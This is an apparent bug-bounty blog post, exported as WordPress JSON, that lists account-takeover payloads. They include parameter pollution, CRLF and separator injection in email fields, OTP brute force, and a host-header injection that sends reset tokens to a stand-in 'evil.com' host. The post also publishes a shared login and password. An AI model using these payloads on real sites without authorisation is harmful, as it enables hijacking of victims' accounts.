{"id":3008,"date":"2023-08-21T07:41:35","date_gmt":"2023-08-21T07:41:35","guid":{"rendered":"https:\/\/secry.me\/explore\/?p=3008"},"modified":"2024-09-24T03:12:16","modified_gmt":"2024-09-24T03:12:16","slug":"bug-bounty-trick-to-find-account-takeover-and-get-bounty","status":"publish","type":"post","link":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/","title":{"rendered":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY"},"content":{"rendered":"<div class=\"c7f5092f831f91fb6af859cc3a8052cc\" data-index=\"4\" style=\"float: none; margin:10px 0 10px 0; text-align:center;\">\n<script async src=\"https:\/\/securepubads.g.doubleclick.net\/tag\/js\/gpt.js\"><\/script>\r\n<script>\r\n  window.googletag = window.googletag || {cmd: []};\r\n  googletag.cmd.push(function() {\r\n    googletag.defineSlot('\/22608490431\/iklan1', [[320, 100], [300, 50]], 'div-gpt-ad-1696178236578-0').addService(googletag.pubads());\r\n    googletag.pubads().enableSingleRequest();\r\n    googletag.enableServices();\r\n  });\r\n<\/script>\r\n<!-- \/22608490431\/iklan1 -->\r\n<div id='div-gpt-ad-1696178236578-0' style='min-width: 300px; min-height: 50px;'>\r\n  <script>\r\n    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1696178236578-0'); });\r\n  <\/script>\r\n<\/div>\n<\/div>\n<p><a href=\"https:\/\/secry.me\/explore\/tips-and-tricks\/bug-bounty-tips-account-takeover\/\">Tips Account Takeover<\/a>: Welcome to our in-depth guide on mastering the art of bug bounty hunting, focusing specifically on account takeover techniques. In today&#8217;s ever-evolving cybersecurity landscape, staying a step ahead of potential vulnerabilities is absolutely crucial. In this article, we&#8217;re going to dive deep into a variety of technique that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of &#8220;Email Replacing&#8221; during the account registration process.<\/p>\n<p>We&#8217;ll also explore techniques like &#8220;Parameter Pollution&#8221; in reset password functionalities, &#8220;OTP Code Bruteforce,&#8221; &#8220;Host Header Injection,&#8221; and even the clever use of separators within parameter values, among other tactics.<\/p>\n<p>Throughout this guide, we&#8217;ll provide you with real-world examples and break down the mechanics behind each technique. Our goal is to arm you with the knowledge and insights necessary to not only identify and understand these vulnerabilities, but also to ethically report them and contribute to a safer digital ecosystem.<\/p>\n<p>So, whether you&#8217;re someone looking to explore the exciting world of ethical hacking or a dedicated security enthusiast, keep reading to elevate your bug bounty skills and play a vital role in ensuring online security.<\/p>\n<p>&nbsp;<\/p>\n<h3>1. Account Takeover Through Email Replacing when Registering Account (testing\/abuse email filter)<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>email@email.com<strong>,<\/strong>victim@hack.secry<br \/>\nemail@email<strong>&#8220;,&#8221;<\/strong>victim@hack.secry<br \/>\nemail@email.com<strong>:<\/strong>victim@hack.secry<br \/>\nemail@email.com<strong>%0d%0a<\/strong>victim@hack.secry<br \/>\n<strong>%0d%0a<\/strong>victim@hack.secry<br \/>\n<strong>%0a<\/strong>victim@hack.secry<br \/>\nvictim@hack.secry<strong>%0d%0a<\/strong><br \/>\nvictim@hack.secry<strong>%0a<\/strong><br \/>\nvictim@hack.secry<strong>%0d<\/strong><br \/>\nvictim@hack.secry<strong>%00<\/strong><br \/>\nvictim@hack.secry<strong>{{}}<\/strong><\/p>\n<p><strong>Example Request:<\/strong><\/p>\n<p>name=<strong><em>HACKER<\/em><\/strong>&amp;email=<em><strong>HACKER@wearehackerone.com<\/strong><\/em>&amp;email=<em><strong>victim@hack.secry<\/strong><\/em>&amp;username=<em><strong>hackerz<\/strong><\/em>&amp;password=<strong>THIS_ISPASSWORD_TO_TAKEOVER<\/strong>&amp;password-confirmation=<strong>THIS_ISPASSWORD_TO_TAKEOVER<\/strong>&amp;_csrf_token=XXX7139a5209c08aec2dbff06f5ab5XXXXXXXXXX<\/p>\n<h3><\/h3>\n<h3>2. Account Takeover Through\u00a0Parameter Pollution in Reset Password<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/passwordReset<br \/>\n[&#8230;]<br \/>\nemail=victim@yahoo.com&amp;email=hacker@yahoo.com<\/p>\n<p>or in JSON:<\/p>\n<p>{&#8220;email&#8221;:[&#8220;andrew@hotmail.com&#8221;,&#8221;hacker@gmail.com&#8221;]}<\/p>\n<p>&nbsp;<\/p>\n<h3>3. Account Takeover Through OTP Code Bruteforce<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/reset<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com&amp;code=$12345$<\/p>\n<p>You can use <a href=\"https:\/\/portswigger.net\/burp\/documentation\/desktop\/tools\/intruder\">Burp Intruder<\/a>.<\/p>\n<p>&nbsp;<\/p>\n<h3>4. Account Takeover Through Host Header Injection<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/reset<br \/>\nHost: evilsite.com<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<\/p>\n<p>POST \/reset<br \/>\nHost: target.com<br \/>\nX-Forwarded-Host: evil.com<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<\/p>\n<p>And the victim will receive the <strong>reset link<\/strong> email with with &#8220;<strong>token<\/strong>&#8221; will contail &#8220;<strong>evilsite.com<\/strong>&#8220;, so when the user click the link, the &#8220;token&#8221; will logged\/extracted to the evilsite.com server log.<\/p>\n<p>&nbsp;<\/p>\n<h3>5. Account Takeover Through Using Separator in Value of the Parameter<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/PWreset<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<strong>,<\/strong>hacker@mail.com<\/p>\n<p>POST \/PWreset<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<strong>%20<\/strong>hacker@mail.com<\/p>\n<p>POST \/PWreset<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<strong>|<\/strong>hacker@mail.com<\/p>\n<p>POST \/PWreset<br \/>\n[&#8230;]<br \/>\nemail=victim@mail.com<strong>%00<\/strong>hacker@mail.com<\/p>\n<p>&nbsp;<\/p>\n<h3>6. Try input No Domain in Value of the Parameter to Account Takeover<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>Example:<\/p>\n<p>POST \/registeraccount<br \/>\n[&#8230;]<br \/>\nemail=victimemail<\/p>\n<p>&nbsp;<\/p>\n<h3>7. Try input No TLD in Email Value of the Parameter<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/reset<br \/>\n[&#8230;]<br \/>\nemail=victimemail@mail.secry<\/p>\n<p>POST \/reset<br \/>\n[&#8230;]<br \/>\n<a href=\"http:\/\/email%3Dvictim%40mail.com%0a%0dcc:hacker@secry.me\/\" target=\"_blank\" rel=\"nofollow noopener\">email=victim@mail.com%0a%0dcc:hacker@secry.me<\/a><\/p>\n<p>&nbsp;<\/p>\n<h3>8. Try Re-Sign up using Same Email<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/newaccount<br \/>\n[&#8230;]<br \/>\nemail=victim@secry.me&amp;password=1234<\/p>\n<p>After sign up using victim email, try signup again but using different password<\/p>\n<p>POST \/newaccount<br \/>\n[&#8230;]<br \/>\nemail=victim@secry.me&amp;password=yourehacked<\/p>\n<p>&nbsp;<\/p>\n<h3>9. If there is JSON data in requests, add comma and input your hacker email<\/h3>\n<p><strong>Example:<\/strong><\/p>\n<p>POST \/newaccount<br \/>\n[&#8230;]<br \/>\n{\u201cemail\u201d:\u201c<a href=\"mailto:victim@mail.com\" target=\"_blank\" rel=\"nofollow noopener\">victim@mail.com<\/a>\u201d,\u201d<a href=\"mailto:hacker@secry.me\" target=\"_blank\" rel=\"nofollow noopener\">hacker@secry.me<\/a>\u201d,\u201ctoken\u201d:\u201dxxxxxxxxxx\u201d}<\/p>\n<p>&nbsp;<\/p>\n<h3>CLOSING<\/h3>\n<p>We acquired this account takeover trick from various sources, with one of them being daffainfo. Among these multiple tricks, there are a few that I have personally attempted and successfully executed. I&#8217;m optimistic that you&#8217;ll achieve success with them as well, someday. Pinterest : <a href=\"https:\/\/www.pinterest.com\/pin\/1001699142167977631\">account takeover tips<\/a><\/p>\n<p>-SECRY<\/p>\n<p>1st Account of <a href=\"https:\/\/ai.secry.me\">ai.secry.me<\/a> :<\/p>\n<p>e:spesial@secry.me<br \/>\np:Spesial123!#@<\/p>\n<p>Note: free 7 days until 01-10-2024,<strong> don&#8217;t change the display name\u00a0<\/strong><\/p>\n<p>Another account? Visit this link: <a href=\"https:\/\/secry.me\/explore\/questions-and-answer-regarding-soc-2-penetration-testing\/\">https:\/\/secry.me\/explore\/questions-and-answer-regarding-soc-2-penetration-testing\/<\/a><\/p>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\"><\/div>\n<div id=\"urban-overlay\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n\n<div style=\"font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;\"><\/div>","protected":false},"excerpt":{"rendered":"<p>Tips Account Takeover: Welcome to our in-depth guide on mastering the art of bug bounty hunting, focusing specifically on account takeover techniques. In today&#8217;s ever-evolving cybersecurity landscape, staying a step ahead of potential vulnerabilities is absolutely crucial. In this article, we&#8217;re going to dive deep into a variety of technique that revolve around exploiting account [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":3036,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[195],"tags":[],"class_list":["post-3008","post","type-post","status-publish","format-standard","has-post-thumbnail","category-tips-and-tricks"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v21.4 (Yoast SEO v27.7) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | SECRY<\/title>\n<meta name=\"description\" content=\"We&#039;re going to dive deep into a variety of technique that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of &quot;Email Replacing&quot; during the account registration process.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | SECRY\" \/>\n<meta property=\"og:description\" content=\"Tips Account Takeover: Welcome to our in-depth guide on mastering the art of bug bounty hunting, focusing specifically on account takeover techniques. In\" \/>\n<meta property=\"og:url\" content=\"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/\" \/>\n<meta property=\"og:site_name\" content=\"SECRY\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/secry.me\" \/>\n<meta property=\"article:published_time\" content=\"2023-08-21T07:41:35+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-09-24T03:12:16+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Christin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Christin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"NewsArticle\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/\"},\"author\":{\"name\":\"Christin\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/907be2b2cdf630b0640516d22bb40deb\"},\"headline\":\"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY\",\"datePublished\":\"2023-08-21T07:41:35+00:00\",\"dateModified\":\"2024-09-24T03:12:16+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/\"},\"wordCount\":659,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/TRICK-ACCOUNT-TAKE-OVER.png\",\"articleSection\":[\"Tips and Tricks\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/\",\"name\":\"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | SECRY\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/TRICK-ACCOUNT-TAKE-OVER.png\",\"datePublished\":\"2023-08-21T07:41:35+00:00\",\"dateModified\":\"2024-09-24T03:12:16+00:00\",\"description\":\"We're going to dive deep into a variety of technique that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of \\\"Email Replacing\\\" during the account registration process.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#primaryimage\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/TRICK-ACCOUNT-TAKE-OVER.png\",\"contentUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/TRICK-ACCOUNT-TAKE-OVER.png\",\"width\":1280,\"height\":720,\"caption\":\"TRICK ACCOUNT TAKEOVER\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/secry.me\\\/explore\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"name\":\"SECRY\",\"description\":\"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections\",\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"alternateName\":\"Security Story\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/secry.me\\\/explore\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\",\"name\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\",\"alternateName\":\"SECRY\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"contentUrl\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"width\":512,\"height\":512,\"caption\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/secry.me\",\"https:\\\/\\\/pinterest.com\\\/secry_me\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/907be2b2cdf630b0640516d22bb40deb\",\"name\":\"Christin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"caption\":\"Christin\"},\"description\":\"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.\",\"sameAs\":[\"https:\\\/\\\/secry.me\\\/explore\"],\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/author\\\/secry\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | SECRY","description":"We're going to dive deep into a variety of technique that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of \"Email Replacing\" during the account registration process.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/","og_locale":"en_US","og_type":"article","og_title":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | SECRY","og_description":"Tips Account Takeover: Welcome to our in-depth guide on mastering the art of bug bounty hunting, focusing specifically on account takeover techniques. In","og_url":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/","og_site_name":"SECRY","article_publisher":"https:\/\/www.facebook.com\/secry.me","article_published_time":"2023-08-21T07:41:35+00:00","article_modified_time":"2024-09-24T03:12:16+00:00","og_image":[{"width":1280,"height":720,"url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png","type":"image\/png"}],"author":"Christin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Christin","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"NewsArticle","@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#article","isPartOf":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/"},"author":{"name":"Christin","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/907be2b2cdf630b0640516d22bb40deb"},"headline":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY","datePublished":"2023-08-21T07:41:35+00:00","dateModified":"2024-09-24T03:12:16+00:00","mainEntityOfPage":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/"},"wordCount":659,"commentCount":0,"publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"image":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png","articleSection":["Tips and Tricks"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/","url":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/","name":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY | SECRY","isPartOf":{"@id":"https:\/\/secry.me\/explore\/#website"},"primaryImageOfPage":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#primaryimage"},"image":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png","datePublished":"2023-08-21T07:41:35+00:00","dateModified":"2024-09-24T03:12:16+00:00","description":"We're going to dive deep into a variety of technique that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of \"Email Replacing\" during the account registration process.","breadcrumb":{"@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#primaryimage","url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png","contentUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/TRICK-ACCOUNT-TAKE-OVER.png","width":1280,"height":720,"caption":"TRICK ACCOUNT TAKEOVER"},{"@type":"BreadcrumbList","@id":"https:\/\/secry.me\/explore\/bug-bounty-trick-to-find-account-takeover-and-get-bounty\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/secry.me\/explore\/"},{"@type":"ListItem","position":2,"name":"Bug Bounty: Trick to Find Account Takeover and GET BOUNTY"}]},{"@type":"WebSite","@id":"https:\/\/secry.me\/explore\/#website","url":"https:\/\/secry.me\/explore\/","name":"SECRY","description":"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections","publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"alternateName":"Security Story","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/secry.me\/explore\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/secry.me\/explore\/#organization","name":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections","alternateName":"SECRY","url":"https:\/\/secry.me\/explore\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/","url":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","contentUrl":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","width":512,"height":512,"caption":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections"},"image":{"@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/secry.me","https:\/\/pinterest.com\/secry_me"]},{"@type":"Person","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/907be2b2cdf630b0640516d22bb40deb","name":"Christin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","caption":"Christin"},"description":"A cybersecurity practitioner with more than 5 years of experience in the 